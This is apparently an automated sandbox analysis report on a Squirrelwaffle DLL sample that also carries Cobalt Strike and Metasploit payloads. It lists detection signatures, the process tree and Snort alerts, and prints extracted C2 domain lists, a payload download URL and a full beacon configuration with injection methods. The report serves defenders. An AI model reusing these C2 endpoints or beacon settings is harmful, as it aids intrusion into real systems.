Loading ...

Play interactive tourEdit tour

Windows Analysis Report p2SijKiqgZ.dll

Overview

General Information

Sample Name:p2SijKiqgZ.dll
Analysis ID:491706
MD5:803768a34f7e59b8a9a2f3969624c47e
SHA1:09a38940ef023929897fdc9c996de0b0f39116e2
SHA256:2a0a88a2e5f9cafa10a48d63bdfcdf965b72c25978ab46cf28e795dbedc9624a
Tags:dllSquirrelwaffle
Infos:

Most interesting Screenshot:

Detection

CobaltStrike Metasploit Squirrelwaffle
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Squirrelwaffle
Yara detected Metasploit Payload
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Antivirus detection for URL or domain
Yara detected CobaltStrike
C2 URLs / IPs found in malware configuration
Contains functionality to detect sleep reduction / modifications
Uses 32bit PE files
Yara signature match
One or more processes crash
Drops certificate files (DER)
Contains functionality to query locales information (e.g. system language)
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Stores large binary data to the registry
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to get notified if a device is plugged in / out
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to record screenshots
HTTP GET or POST without a user agent
Extensive use of GetProcAddress (often used to hide API calls)
PE file contains strange resources
Adds / modifies Windows certificates
Contains functionality to read the PEB
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Contains functionality to retrieve information about pressed keystrokes
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
May check if the current machine is a sandbox (GetTickCount - Sleep)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 6620 cmdline: loaddll32.exe 'C:\Users\user\Desktop\p2SijKiqgZ.dll' MD5: 542795ADF7CC08EFCF675D65310596E8)
    • cmd.exe (PID: 6644 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\p2SijKiqgZ.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 6688 cmdline: rundll32.exe 'C:\Users\user\Desktop\p2SijKiqgZ.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • WerFault.exe (PID: 6844 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6688 -s 732 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup

Malware Configuration

Threatname: Squirrelwaffle

{"C2 urls": ["acdlimited.com/2u6aW9Pfe", "jornaldasoficinas.com/ZF8GKIGVDupL", "orldofjain.com/lMsTA7tSYpe", "altayaralsudani.net/SSUsPgb7PHgC", "hoteloaktree.com/QthLWsZsVgb", "aterwellnessinc.com/U7D0sswwp", "sirifinco.com/Urbhq9wO50j", "ordpress17.com/5WG6Z62sKWo", "mohsinkhanfoundation.com/pcQLeLMbur", "lendbiz.vn/xj3BhHtMbf", "geosever.rs/ObHP1CHt", "nuevainfotech.com/xCNyTjzkoe", "dadabhoy.pk/m6rQE94U", "111", "sjgrand.lk/zvMYuQqEZj", "erogholding.com/GFM1QcCFk", "armordetailing.rs/lgfrZb4Re6WO", "lefrenchwineclub.com/eRUGdDox"]}

Threatname: Metasploit

{"Headers": "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nReferer: http://code.jquery.com/\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko\r\n", "Type": "Metasploit Download", "URL": "http://23.82.140.206/jquery-3.3.1.slim.min.js"}

Threatname: CobaltStrike

{"BeaconType": ["HTTPS"], "Port": 8080, "SleepTime": 45000, "MaxGetSize": 1403644, "Jitter": 37, "C2Server": "tuxsecuritybiness.com,/jquery-3.3.1.min.js,23.82.140.206,/jquery-3.3.1.min.js", "HttpPostUri": "/jquery-3.3.2.min.js", "Malleable_C2_Instructions": ["Remove 1522 bytes from the end", "Remove 84 bytes from the beginning", "Remove 3931 bytes from the beginning", "Base64 URL-safe decode", "XOR mask w/ random key"], "SpawnTo": "AAAAAAAAAAAAAAAAAAAAAA==", "HttpGet_Verb": "GET", "HttpPost_Verb": "POST", "HttpPostChunk": 0, "Spawnto_x86": "%windir%\\syswow64\\dllhost.exe", "Spawnto_x64": "%windir%\\sysnative\\dllhost.exe", "CryptoScheme": 0, "Proxy_Behavior": "Use IE settings", "Watermark": 0, "bStageCleanup": "True", "bCFGCaution": "False", "KillDate": 0, "bProcInject_StartRWX": "False", "bProcInject_UseRWX": "False", "bProcInject_MinAllocSize": 17500, "ProcInject_PrependAppend_x86": ["kJA=", "Empty"], "ProcInject_PrependAppend_x64": ["kJA=", "Empty"], "ProcInject_Execute": ["ntdll:RtlUserThreadStart", "CreateThread", "NtQueueApcThread-s", "CreateRemoteThread", "RtlCreateUserThread"], "ProcInject_AllocationMethod": "NtMapViewOfSection", "bUsesCookies": "True", "HostHeader": ""}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.518421340.0000000002E90000.00000040.00000001.sdmpCobaltbaltstrike_RAW_Payload_https_stager_x86Detects CobaltStrike payloadsAvast Threat Intel Team
  • 0x0:$h01: FC E8 89 00 00 00 60 89 E5 31 D2 64 8B 52 30 8B 52 0C 8B 52 14 8B 72 28
00000000.00000002.518421340.0000000002E90000.00000040.00000001.sdmpJoeSecurity_MetasploitPayload_3Yara detected Metasploit PayloadJoe Security
    00000000.00000002.516568277.00000000009F0000.00000004.00000020.sdmpCobaltbaltstrike_RAW_Payload_https_stager_x86Detects CobaltStrike payloadsAvast Threat Intel Team
    • 0x1bf90:$h01: FC E8 89 00 00 00 60 89 E5 31 D2 64 8B 52 30 8B 52 0C 8B 52 14 8B 72 28
    00000000.00000002.516568277.00000000009F0000.00000004.00000020.sdmpJoeSecurity_MetasploitPayload_3Yara detected Metasploit PayloadJoe Security
      00000003.00000000.254857742.0000000004590000.00000040.00000001.sdmpJoeSecurity_SquirrelwaffleYara detected SquirrelwaffleJoe Security
        Click to see the 11 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        0.2.loaddll32.exe.2630000.2.unpackJoeSecurity_SquirrelwaffleYara detected SquirrelwaffleJoe Security
          3.0.rundll32.exe.4590000.6.raw.unpackJoeSecurity_SquirrelwaffleYara detected SquirrelwaffleJoe Security
            0.2.loaddll32.exe.2a70184.3.raw.unpackJoeSecurity_SquirrelwaffleYara detected SquirrelwaffleJoe Security
              3.2.rundll32.exe.45a0000.3.unpackJoeSecurity_SquirrelwaffleYara detected SquirrelwaffleJoe Security
                0.2.loaddll32.exe.9b0000.1.raw.unpackJoeSecurity_SquirrelwaffleYara detected SquirrelwaffleJoe Security
                  Click to see the 7 entries

                  Sigma Overview

                  No Sigma rule has matched

                  Jbx Signature Overview

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection:

                  barindex
                  Found malware configurationShow sources
                  Source: 00000000.00000002.518421340.0000000002E90000.00000040.00000001.sdmpMalware Configuration Extractor: Metasploit {"Headers": "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nReferer: http://code.jquery.com/\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko\r\n", "Type": "Metasploit Download", "URL": "http://23.82.140.206/jquery-3.3.1.slim.min.js"}
                  Source: 00000000.00000002.519373295.0000000003B20000.00000040.00000001.sdmpMalware Configuration Extractor: CobaltStrike {"BeaconType": ["HTTPS"], "Port": 8080, "SleepTime": 45000, "MaxGetSize": 1403644, "Jitter": 37, "C2Server": "tuxsecuritybiness.com,/jquery-3.3.1.min.js,23.82.140.206,/jquery-3.3.1.min.js", "HttpPostUri": "/jquery-3.3.2.min.js", "Malleable_C2_Instructions": ["Remove 1522 bytes from the end", "Remove 84 bytes from the beginning", "Remove 3931 bytes from the beginning", "Base64 URL-safe decode", "XOR mask w/ random key"], "SpawnTo": "AAAAAAAAAAAAAAAAAAAAAA==", "HttpGet_Verb": "GET", "HttpPost_Verb": "POST", "HttpPostChunk": 0, "Spawnto_x86": "%windir%\\syswow64\\dllhost.exe", "Spawnto_x64": "%windir%\\sysnative\\dllhost.exe", "CryptoScheme": 0, "Proxy_Behavior": "Use IE settings", "Watermark": 0, "bStageCleanup": "True", "bCFGCaution": "False", "KillDate": 0, "bProcInject_StartRWX": "False", "bProcInject_UseRWX": "False", "bProcInject_MinAllocSize": 17500, "ProcInject_PrependAppend_x86": ["kJA=", "Empty"], "ProcInject_PrependAppend_x64": ["kJA=", "Empty"], "ProcInject_Execute": ["ntdll:RtlUserThreadStart", "CreateThread", "NtQueueApcThread-s", "CreateRemoteThread", "RtlCreateUserThread"], "ProcInject_AllocationMethod": "NtMapViewOfSection", "bUsesCookies": "True", "HostHeader": ""}
                  Source: 3.0.rundll32.exe.45a0000.7.unpackMalware Configuration Extractor: Squirrelwaffle {"C2 urls": ["acdlimited.com/2u6aW9Pfe", "jornaldasoficinas.com/ZF8GKIGVDupL", "orldofjain.com/lMsTA7tSYpe", "altayaralsudani.net/SSUsPgb7PHgC", "hoteloaktree.com/QthLWsZsVgb", "aterwellnessinc.com/U7D0sswwp", "sirifinco.com/Urbhq9wO50j", "ordpress17.com/5WG6Z62sKWo", "mohsinkhanfoundation.com/pcQLeLMbur", "lendbiz.vn/xj3BhHtMbf", "geosever.rs/ObHP1CHt", "nuevainfotech.com/xCNyTjzkoe", "dadabhoy.pk/m6rQE94U", "111", "sjgrand.lk/zvMYuQqEZj", "erogholding.com/GFM1QcCFk", "armordetailing.rs/lgfrZb4Re6WO", "lefrenchwineclub.com/eRUGdDox"]}
                  Multi AV Scanner detection for submitted fileShow sources
                  Source: p2SijKiqgZ.dllReversingLabs: Detection: 15%
                  Antivirus detection for URL or domainShow sources
                  Source: https://tuxsecuritybiness.com:8080/jquery-3.3.1.min.jsfwAvira URL Cloud: Label: malware
                  Source: https://tuxsecuritybiness.com:8080/jquery-3.3.1.min.jsAvira URL Cloud: Label: malware
                  Source: https://tuxsecuritybiness.com:8080/Avira URL Cloud: Label: malware
                  Source: tuxsecuritybiness.comAvira URL Cloud: Label: malware
                  Source: https://tuxsecuritybiness.com:8080/jquery-3.3.1.min.jsmohsinkhanfoundation.comAvira URL Cloud: Label: malware
                  Source: https://tuxsecuritybiness.com/vAvira URL Cloud: Label: malware
                  Source: https://tuxsecuritybiness.com/Avira URL Cloud: Label: malware
                  Source: https://tuxsecuritybiness.com:8080/jquery-3.3.1.min.jsVwAvira URL Cloud: Label: malware
                  Source: p2SijKiqgZ.dllStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
                  Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000006.00000003.259967612.0000000004F0D000.00000004.00000001.sdmp
                  Source: Binary string: sfc_os.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: bcrypt.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000006.00000003.265587700.0000000004C50000.00000004.00000040.sdmp
                  Source: Binary string: version.pdb} source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000006.00000003.265560941.00000000053A1000.00000004.00000001.sdmp
                  Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000006.00000003.265587700.0000000004C50000.00000004.00000040.sdmp
                  Source: Binary string: wntdll.pdb source: WerFault.exe, 00000006.00000003.265560941.00000000053A1000.00000004.00000001.sdmp
                  Source: Binary string: shcore.pdb source: WerFault.exe, 00000006.00000003.265587700.0000000004C50000.00000004.00000040.sdmp
                  Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000006.00000003.265560941.00000000053A1000.00000004.00000001.sdmp
                  Source: Binary string: fltLib.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: advapi32.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: shell32.pdb source: WerFault.exe, 00000006.00000003.265587700.0000000004C50000.00000004.00000040.sdmp
                  Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000006.00000003.265560941.00000000053A1000.00000004.00000001.sdmp
                  Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000006.00000003.265560941.00000000053A1000.00000004.00000001.sdmp
                  Source: Binary string: wimm32.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: mpr.pdb source: WerFault.exe, 00000006.00000003.265587700.0000000004C50000.00000004.00000040.sdmp
                  Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000006.00000003.265560941.00000000053A1000.00000004.00000001.sdmp
                  Source: Binary string: setupapi.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: imagehlp.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: wUxTheme.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: msvcp140.i386.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: shlwapi.pdb{ source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: dwmapi.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: shcore.pdbk source: WerFault.exe, 00000006.00000003.265587700.0000000004C50000.00000004.00000040.sdmp
                  Source: Binary string: iphlpapi.pdbt source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: profapi.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: ws2_32.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: winspool.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000006.00000003.265560941.00000000053A1000.00000004.00000001.sdmp
                  Source: Binary string: shell32.pdbk source: WerFault.exe, 00000006.00000003.265587700.0000000004C50000.00000004.00000040.sdmp
                  Source: Binary string: sechost.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: iphlpapi.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: propsys.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: cfgmgr32.pdbk source: WerFault.exe, 00000006.00000003.265587700.0000000004C50000.00000004.00000040.sdmp
                  Source: Binary string: wsspicli.pdbc source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: ucrtbase.pdbk source: WerFault.exe, 00000006.00000003.265587700.0000000004C50000.00000004.00000040.sdmp
                  Source: Binary string: powrprof.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: msctf.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: ole32.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: version.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: AcLayers.pdb source: WerFault.exe, 00000006.00000003.265560941.00000000053A1000.00000004.00000001.sdmp
                  Source: Binary string: vcruntime140.i386.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000006.00000003.265587700.0000000004C50000.00000004.00000040.sdmp
                  Source: Binary string: winspool.pdbe source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: wUxTheme.pdb# source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: cryptbase.pdbw source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: sechost.pdbi source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: comctl32v582.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: netapi32.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000006.00000003.265587700.0000000004C50000.00000004.00000040.sdmp
                  Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000006.00000003.265587700.0000000004C50000.00000004.00000040.sdmp
                  Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000006.00000003.265587700.0000000004C50000.00000004.00000040.sdmp
                  Source: Binary string: combase.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: C:\Users\Administrator\source\repos\Dll1\Release\Dll1.pdb source: loaddll32.exe, 00000000.00000002.518246060.0000000002A70000.00000040.00000001.sdmp, rundll32.exe
                  Source: Binary string: rundll32.pdb source: WerFault.exe, 00000006.00000003.265560941.00000000053A1000.00000004.00000001.sdmp
                  Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: sfc.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: apphelp.pdb source: WerFault.exe, 00000006.00000003.265560941.00000000053A1000.00000004.00000001.sdmp
                  Source: Binary string: wuser32.pdb source: WerFault.exe, 00000006.00000003.265560941.00000000053A1000.00000004.00000001.sdmp
                  Source: Binary string: advapi32.pdb_ source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: comctl32.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: netutils.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00968B24 FreeLibrary,UnregisterDeviceNotification,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_009452FC GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,

                  Networking:

                  barindex
                  Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                  Source: TrafficSnort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49751
                  Source: TrafficSnort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49751
                  Source: TrafficSnort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49754
                  Source: TrafficSnort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49754
                  Source: TrafficSnort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49756
                  Source: TrafficSnort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49756
                  Source: TrafficSnort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49762
                  Source: TrafficSnort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49762
                  Source: TrafficSnort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49764
                  Source: TrafficSnort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49764
                  Source: TrafficSnort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49765
                  Source: TrafficSnort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49765
                  Source: TrafficSnort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49768
                  Source: TrafficSnort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49768
                  Source: TrafficSnort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49770
                  Source: TrafficSnort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49770
                  Source: TrafficSnort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49772
                  Source: TrafficSnort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49772
                  Source: TrafficSnort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49774
                  Source: TrafficSnort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49774
                  Source: TrafficSnort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49776
                  Source: TrafficSnort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49776
                  Source: TrafficSnort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49777
                  Source: TrafficSnort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49777
                  Source: TrafficSnort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49778
                  Source: TrafficSnort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49778
                  Source: TrafficSnort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49780
                  Source: TrafficSnort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49780
                  Source: TrafficSnort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49781
                  Source: TrafficSnort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49781
                  Source: TrafficSnort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49783
                  Source: TrafficSnort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49783
                  Source: TrafficSnort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49785
                  Source: TrafficSnort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49785
                  Source: TrafficSnort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49787
                  Source: TrafficSnort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49787
                  Source: TrafficSnort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49789
                  Source: TrafficSnort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49789
                  Source: TrafficSnort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49790
                  Source: TrafficSnort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49790
                  Source: TrafficSnort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49792
                  Source: TrafficSnort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49792
                  Source: TrafficSnort IDS: 2018316 ET TROJAN Zeus GameOver Possible DGA NXDOMAIN Responses 8.8.8.8:53 -> 192.168.2.7:58498
                  Source: TrafficSnort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49794
                  Source: TrafficSnort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49794
                  Source: TrafficSnort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49796
                  Source: TrafficSnort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49796
                  Source: TrafficSnort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49798
                  Source: TrafficSnort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49798
                  Source: TrafficSnort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49800
                  Source: TrafficSnort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49800
                  Source: TrafficSnort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49802
                  Source: TrafficSnort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49802
                  Source: TrafficSnort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49804
                  Source: TrafficSnort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49804
                  Source: TrafficSnort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49806
                  Source: TrafficSnort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49806
                  Source: TrafficSnort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49810
                  Source: TrafficSnort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49810
                  Source: TrafficSnort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49811
                  Source: TrafficSnort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49811
                  Source: TrafficSnort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49813
                  Source: TrafficSnort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49813
                  Source: TrafficSnort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49815
                  Source: TrafficSnort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49815
                  Source: TrafficSnort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49817
                  Source: TrafficSnort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49817
                  Source: TrafficSnort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49819
                  Source: TrafficSnort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49819
